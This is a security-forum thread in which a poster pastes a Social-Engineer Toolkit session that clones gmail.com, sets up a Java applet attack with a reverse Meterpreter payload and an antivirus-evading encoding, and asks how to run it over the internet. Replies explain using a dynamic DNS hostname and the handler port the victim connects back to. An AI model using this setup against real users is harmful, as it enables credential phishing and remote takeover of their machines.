Jump to content

[query] Java Applet Set- Over The Internet


Shinigami

Recommended Posts

Hi, before i pose my query, I would like to introduce myself. I'm a CEH and ECSA for quite some time now. However I'm still learning and today I was just curious in understanding the routing on how SET is connected to the MSF.

Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to. Setting up JavaApplet in S.E.T:


   1) Java Applet Attack Method

set:webattack>1

   2) Site Cloner

set:webattack>2

[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.

set> Are you using NAT/Port Forwarding [yes|no]: y  

#####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***######

#####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n#######

[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:https://gmail.com

[*] Cloning the website: https://gmail.com
 [*] Malicious java applet website prepped for deployment

What payload do you want to generate:

  Name:                                       Description:
   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
set:payloads>2

Below is a list of encodings to try and bypass AV. 
Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
  16) Backdoored Executable (BEST)

set:encoding>16
#####set:payloads> PORT of the listener [443]:#####

[*] Generating x64-based powershell injection code...

FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

SECOND: The Second line of code following, I seriously don't understand this. If I put in a Local Static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'Correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option Before this one? & why would it ask for my HANDLER's IP when it generates its own Handler? Please elaborate this option thank you.

THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?

LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester along side when they both are on different ports?

Thankyou

Link to comment
Share on other sites

FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

If your external IP address is dynamic, than I'd use No-IP "hostname", if it's static I'd just use the IP.

THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?

Correct, when the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443 but it can be changed to any port you want.

LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester along side when they both are on different ports?

It won't be possible to run both applications on the same ports, what you could do is have both apps running at the same time but on different ports.

Link to comment
Share on other sites

If your external IP address is dynamic, than I'd use No-IP "hostname", if it's static I'd just use the IP.

Correct, when the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443 but it can be changed to any port you want.

It won't be possible to run both applications on the same ports, what you could do is have both apps running at the same time but on different ports.

Thank you! Very grateful for your response, very elaborate. Can you please explain the SECOND query I posted? Concerning the code where it asks if my Metasploit is running on the same IP or a different one. Should I use my Local IP here or Public again?

Thanks again.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...